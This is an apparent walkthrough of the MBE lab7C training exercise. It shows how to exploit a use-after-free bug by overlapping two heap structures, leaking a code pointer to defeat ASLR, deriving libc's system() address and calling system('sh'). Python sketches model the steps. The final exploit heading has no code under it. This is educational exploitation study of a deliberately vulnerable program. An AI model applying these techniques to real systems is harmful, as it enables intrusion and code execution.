Exploiting the same Use after Free twice to leak the mem layout and execute code - MBE LAB7C walkthrough
The target app
This time we are dealing with a very plain and simple UaF vulnerability. The source code can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab07/lab7C.c
Right away we can see two data structure definitions, which more or less suggest what we are going to be dealing with (structures holding some data along with function pointers):
The menu clearly shows which operations are available:
After creating instances of the structures we'll be able to call their dedicated (* print) pointers.
If you are familiar with Use after Free, you already know what it all boils down to. We allocate one of the structures, fill it with arbitrary data wherever we can control it, and ask the program to remove it. Then we allocate an instance of the other structure in the space previously taken by the first one. Finally, we abuse the stale pointer the program still keeps for the first structure to perform its structure-specific operation, which makes a function call to an arbitrary address we smuggled in through the data of the second structure.
How data is aligned in memory
So, to find out which fields of the two structures overlap with each other, and therefore which exploitation sequence to use, we first need to know exactly how the data is laid out in memory.
My initial assumption was that the number structure is 16 bytes long, while the data structure is 32. So I expected to need two number structures to fill the space previously taken by one data structure.
So I ran gdb, only to find out I was wrong. I allocated three numbers in a row, then took the current heap start address from the vmmap output (it is important to do this AFTER the first allocation, otherwise you won't even see the [heap] section in the vmmap output, because it has not been mapped yet) and had a look. Then I restarted the program and did the same with the data structure. The results are illustrated by the screenshot below:
As we can see, both structures take 32 bytes (what I had taken for a 16-byte structure occupies 32 bytes as well). This is very convenient for us, as we won't have to struggle with lining up different numbers of instances against each other to get a favorable overlap.
Combining mutually-overlapping fields of both structures to find the proper codexec UaF scenario
Since I had already started visualizing the memory layout, I decided to take further advantage of it and compare which fields of one structure correspond to which fields of the other.
On the upper part of the screenshot (number) function pointers were marked red and actual numbers were marked green. On the lower part of the screenshot (data) function pointers were marked green and the last four bytes of the string were marked red:
Looking at this for just a few seconds made it clear to me how to achieve execution control.
We can see that in the number structure, the function pointer (0xb770ccb4 on the screenshot above) occupies the same space that, when allocated with a string, always contains at least one null byte (0x00414141 on the screenshot above). This is because the string is automatically null-terminated by fgets() and we can't control it.
Hence, allocating a number, then deleting it, allocating a string in its place and then requesting the program to print the number won't get us far: we'll just crash the program by calling 0x00ANYTHING. We only control three of the four bytes, and fgets() will always put a null byte exactly where we would need an arbitrary value (the most significant byte of the address), so even a partial overwrite won't help us.
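To make the dead end concrete, here is a minimal sketch using only Python's struct module. It assumes a little-endian 32-bit target (as in the heap dumps above); the helper name is made up for illustration and is not part of the lab.

```python
import struct

def dword_from_string_tail(tail: bytes) -> int:
    """Read 3 attacker-controlled bytes plus the string terminator as a little-endian dword."""
    if len(tail) != 3:
        raise ValueError("exactly three bytes are controllable here")
    raw = tail + b"\x00"          # the NUL terminator lands in the most significant byte
    return struct.unpack("<I", raw)[0]

# Whatever we type, the top byte of the would-be pointer stays 0x00.
print(hex(dword_from_string_tail(b"AAA")))   # 0x414141, i.e. 0x00414141
```

The value matches the 0x00414141 seen in the dump: the top byte is out of our hands, so this overlap cannot produce a useful call target.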
At the same time we can see that the space holding the actual number value (0x41414141 on the screenshot above), which we can control fully as numbers from all ranges are acceptable, sits in the same place as the function pointer of the string structure (0xb774dc16 on the screenshot above). Hence, allocating a string, deleting it, creating an arbitrary number and then requesting the string to be printed would lead to the program trying to print the already freed string with the code pointed to by our newly created number, still treating it as a pointer to the string-printing function.
Let's try it.
We add a string (its contents are irrelevant for now, we only need it to be allocated and tracked by the program):
Now we remove it:
OK. Now we are going to introduce the address we will trick the target program into calling (in our final exploit this will be the address of system()). Let's say we want the program to crash by calling address 0x31337157 (because it's not a valid address in its address space).
Calculating the decimal format:
$ printf "%d" 0x31337157
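The same conversion can be done in Python, which is handy later when the address comes from a script rather than from the shell. This is a small sketch; the function name is an illustrative choice, and it assumes the program accepts the full unsigned 32-bit range as described above.

```python
def to_menu_number(address: int) -> str:
    """Return a 32-bit address as the decimal string to type into the program."""
    if not 0 <= address <= 0xFFFFFFFF:
        raise ValueError("expected a 32-bit address")
    return str(address)

print(to_menu_number(0x31337157))   # 825454935
```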
Now, asking the program to print string 1 should lead to a segfault at 0x31337157:
Yup. And the string itself will be useful to us to control the argument (so we'll put system()'s address in place of 0x31337157 and "sh" as the string, leading to system("sh")).
If we look at the corresponding fields on the heap layout, we'll see that the first 16 bytes of the string buffer overlap with the reserved field of the number structure. This means that if we allocate a number after removing a string, so that it takes the space the string was allocated on, those 16 bytes will be left alone and will keep the old values from the string.
system("sh") should be doable:
- create a string "sh"
- delete the string
- create a number == libc system()'s address
- 'print' the string
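The four steps above can be modelled offline on a plain byte array, which is a cheap way to double-check the overlap before touching the real target. This is only a sketch under stated assumptions: the offsets are the ones read from the heap dumps in this post (the buffer start at +0x10 is inferred from them), free() is modelled as leaving the bytes in place, and all addresses are placeholders rather than values from the lab.

```python
import struct

# Offsets inside the heap chunk, taken from the dumps discussed in the text.
BUF_OFF, BUF_LEN = 0x10, 20   # string buffer (start offset is inferred)
NUM_PRINT_OFF = 0x20          # number: function pointer
NUM_VALUE_OFF = 0x24          # number: the value itself
STR_PRINT_OFF = 0x24          # string: function pointer (same slot as the value)

# Placeholder addresses, purely illustrative.
PRINT_STRING = 0xB774DC16
PRINT_NUMBER = 0xB770CCB4
SYSTEM = 0xB7601234

def make_string(chunk: bytearray, text: bytes) -> None:
    data = text[:BUF_LEN - 1] + b"\x00"              # fgets()-style termination
    chunk[BUF_OFF:BUF_OFF + len(data)] = data
    struct.pack_into("<I", chunk, STR_PRINT_OFF, PRINT_STRING)

def make_number(chunk: bytearray, value: int) -> None:
    struct.pack_into("<I", chunk, NUM_PRINT_OFF, PRINT_NUMBER)
    struct.pack_into("<I", chunk, NUM_VALUE_OFF, value)

def print_stale_string(chunk: bytearray):
    """Return (address that would be called, string argument passed to it)."""
    target = struct.unpack_from("<I", chunk, STR_PRINT_OFF)[0]
    buf = bytes(chunk[BUF_OFF:BUF_OFF + BUF_LEN])
    return target, buf.split(b"\x00", 1)[0]

chunk = bytearray(0x28)
make_string(chunk, b"sh")        # 1. create a string "sh"
                                 # 2. delete it (bytes stay where they are)
make_number(chunk, SYSTEM)       # 3. create a number == system()'s address
target, arg = print_stale_string(chunk)   # 4. 'print' the string
print(hex(target), arg)
```

In the model the stale string "print" ends up calling the number we supplied, with the untouched "sh" as its argument, which is exactly the system("sh") shape we are after.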
The only problem we have got left to figure out is how to leak the memory layout to bypass ASLR.
Combining mutually-overlapping fields of both structures to find the proper UaF leak scenario
Looking at the layout again gave me a potential answer literally at first glance (which shows how crucial it is to actually see the layout).
As we want to leak memory, we need to call a function taking an argument that happens to be/store a pointer.
The goal is to see both possible states of the memory combined and find such a combination of values that will let us achieve our goal. Let's look at the layout again, this time focusing on two particular neighboring double word values we would like to have in one state - and then think if we can groom the memory into that state:
When the space is occupied by a number structure, the +0x20 address contains a pointer (to the number-printing function), while +0x24 contains data (the number, in this case 0x41414141, but that's irrelevant to our goal, thus marked gray).
Conversely, when the space is occupied by a data structure, the +0x20 address contains data (the last three bytes of the string and its terminating null byte, useless to us, hence marked gray), while +0x24 contains a pointer (to the string-printing function).
We want to trick the program into creating that state, so that we can call the small_num number-printing function with the address of the string-printing function sitting in the space previously occupied by an irrelevant number, before that space was free()'d and then allocated again (but not entirely overwritten!) for the string structure.
So, we create a number, then we remove it (number[index] is still not 0, even though the structure it was pointing at was 'removed', which means the program will still let us print it).
Then we create a relatively short (less than 15-character) string, to avoid fgets() overwriting the last four bytes of the buff, because that is where the old number's function pointer still sits.
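The leak sequence can be rehearsed on the same kind of byte-array model before stepping through it in gdb. Again, this is a sketch and not the lab's code: the offsets come from the heap dumps in this post (the buffer start is inferred), free() is modelled as a no-op on the contents, and PRINT_NUMBER is a hypothetical address.

```python
import struct

BUF_OFF = 0x10            # inferred start of the 20-byte string buffer
NUM_PRINT_OFF = 0x20      # number: function pointer (last 4 bytes of the buffer)
NUM_VALUE_OFF = 0x24      # number: value, and also the string's function pointer

PRINT_NUMBER = 0xB779DB55  # hypothetical address of the number-printing function
PRINT_STRING = 0xB779DBC7  # the value that shows up as the leak in this post

def leak_demo(text: bytes):
    """Return (function called, argument) when the stale number is printed."""
    if len(text) > 19:
        raise ValueError("the buffer holds at most 19 characters plus the terminator")
    chunk = bytearray(0x28)
    # 1. create a number (its value does not matter)
    struct.pack_into("<II", chunk, NUM_PRINT_OFF, PRINT_NUMBER, 0x41414141)
    # 2. delete the number: the bytes stay in place
    # 3. create a string in the same chunk
    data = text + b"\x00"
    chunk[BUF_OFF:BUF_OFF + len(data)] = data
    struct.pack_into("<I", chunk, NUM_VALUE_OFF, PRINT_STRING)
    # 4. print the stale number
    return struct.unpack_from("<II", chunk, NUM_PRINT_OFF)

func, arg = leak_demo(b"A" * 15)
print(hex(func), hex(arg))

broken, _ = leak_demo(b"A" * 16)   # one character too many clobbers the pointer
print(hex(broken))
```

With 15 characters the number-printing pointer survives and its argument is the string-printing function's address. With 16, the terminator already zeroes the pointer's lowest byte, which is why the string has to stay short.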
Let's try this in slow motion, using a breakpoint in the main loop:
First, we allocate a number (1):
Now, this is the heap:
Now, we remove the number:
And again, this is the heap (yes, everything is still there after free()):
Now, we create a short string (fewer than 15 characters, as explained above):
Now, this is the heap:
Now, requesting the program to print the number will make it call the number-printing function with 0xb779dbc7 as its argument, so we have our leak:
So, we have a number vomited out. Let's convert it to a format more readable to us (hex):
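A small Python helper does the job. This is a sketch; the function name is illustrative, and the mask is there only in case the program prints the value as a signed integer.

```python
def leaked_to_hex(printed: str) -> str:
    """Convert the decimal number printed by the program into a 32-bit hex address."""
    value = int(printed.strip())
    return hex(value & 0xFFFFFFFF)   # the mask also normalizes a negative printout

print(leaked_to_hex("3078216647"))   # 0xb779dbc7
```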
Looks good. Let's confirm in gdb:
Awesome. It looks like we have all the bits and pieces to develop an exploit! :D
Calculating system()'s address
This time I decided to skip leaking the contents of printf()'s GOT entry (as I did in https://hackingiscool.pl/mbe-is-fun-lab6a-walkthrough/) to calculate the system() address.
Instead, I decided to find out whether libc's system() address could be calculated based only on the leaked base of the target program's code segment, and it turned out it can! At least on the VM provided for MBE.
Either way, let's first have a look around, as if we were about to leak the GOT anyway:
Here are, respectively, our code, rodata and data segments (again, forming a contiguous region with fixed offsets from each other):
OK, now we search these ranges for the 0xb7622280 value (the address of printf()), as we know it has to be stored in the GOT after the first call.
This time (as opposed to what we had in https://hackingiscool.pl/mbe-is-fun-lab6a-walkthrough/), our entry is at offset 0xfa4 in the rodata (read-only data) segment, which at the time of taking the screenshot above was at base 0xb77b4000. This is most likely the result of the -z relro gcc compilation flag:
That's OK, this is a countermeasure against GOT overwrites, we don't care about it this time at all.
If we were doing this the usual way, we would leak the code base first. Then we would calculate the rodata address, and from it the address of printf()'s GOT entry, so that we could leak printf()'s address from it. Then, based on its fixed offset from system() within libc itself, we would calculate system()'s address. Then get a shell.
But let's try a more direct approach and run the program a few times, observing the vmmap output and focusing on the relation between the target app code segment base (which we can already leak) and the libc base (which we want to know as well):
Yup, in both cases the offsets are the same:
Hence, one leak is enough here (which would not be the case for the stack or the heap, but we don't care about those here).
So, once we subtract 0x1dd000 from the leaked target app code base, we have the libc code base.
Now we want to know system()'s offset within libc itself (as opposed to calculating its distance from another libc function, such as printf()).
The required calculations can be done with the Python code below:
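What follows is a sketch of those calculations, not the original listing. The only constant taken from this post is the 0x1dd000 distance between the code base and the libc base. The two offsets are parameters that have to be read from the actual binaries, and the values in the example call are hypothetical placeholders.

```python
LIBC_DELTA = 0x1DD000   # code base minus libc base, as observed on the MBE VM

def system_address(leaked_print_ptr: int, print_offset: int, system_offset: int) -> int:
    """Derive system()'s runtime address from the leaked string-printing pointer.

    print_offset  - offset of the string-printing function inside the target binary
    system_offset - offset of system() inside libc
    Both must come from the real files; nothing here guesses them.
    """
    code_base = leaked_print_ptr - print_offset
    if code_base & 0xFFF:
        raise ValueError("code base is not page-aligned, check print_offset")
    libc_base = code_base - LIBC_DELTA
    return (libc_base + system_offset) & 0xFFFFFFFF

# Example with the leak from this post and made-up offsets (assumptions only).
addr = system_address(0xB779DBC7, print_offset=0xBC7, system_offset=0x40000)
print(hex(addr), addr)   # hex for reading, decimal for typing into the program
```

The page-alignment check is a cheap guard against a wrong print_offset. With pwntools installed, the two offsets could be looked up through its ELF class (for example the symbols mapping of the loaded libc) instead of being hard-coded.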
With all this in place, we can already exploit the program.
This exploitation can easily be carried out by just interacting with the program in the console, choosing the right menu options and entering simple strings and numbers:
Full python exploit (pwnlib)